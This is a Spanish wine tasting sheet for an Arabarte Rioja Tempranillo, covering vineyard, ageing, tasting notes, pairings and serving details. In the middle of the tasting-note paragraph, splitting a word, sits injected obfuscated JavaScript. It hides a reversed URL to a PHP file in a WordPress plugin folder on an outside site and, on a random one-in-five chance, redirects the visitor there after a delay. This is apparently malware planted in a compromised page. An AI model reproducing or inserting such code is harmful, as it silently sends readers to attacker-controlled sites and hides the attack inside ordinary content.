ARABARTE RIOJA

ROYAL MOON TEMPRANILLO TINTO


NOTAS DE CATA


VARIEDAD DE UVA

Variedad Tempranillo Negro 100%, de nuestros propios viñedos de más de 60 años, situados a unos 650 metros de altitud, en terrenos arcilloso-calcáreos. Plantaciones en minifundios en poda de vaso, en secano, con rendimientos muy pobres de 2.500 a 3.000 kg/ Hectárea.

 

VINIFICACIÓN

Maceración intensa y prolongada. Fermentación alcohólica controlada y crianza durante 6 meses en barricas nuevas, de roble francés, de tostado muy fino, mas otros 6 meses de maduración en botella.

 

NOTA DE CATA

De color rojo rubí, manteniendo intensidad colorante de un tono acerezado, con tintes azulados y purpúreos. En nariz combina los olores frutales y frescos con aromas de gran complejidad a frutas maduras y especias. En boca presenta una excelente y viva acidez; está muy bien estructurado, de sabrosos taninos con un final aromático potente y de larga persistencia, domin$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a las aportaciones propias de la madera.

 

MARIDAJE

Recomendado para acompañar huevos, asados, callos, Bacalao, carnes rojas, pescados azules, quesos curados y acompaña genialmente a los postres de chocolate.

 

TEMPERATURA DE CONSUMO

Consumir a 14-16º.

 

GRADO ALCOHÓLICO

14% Vol.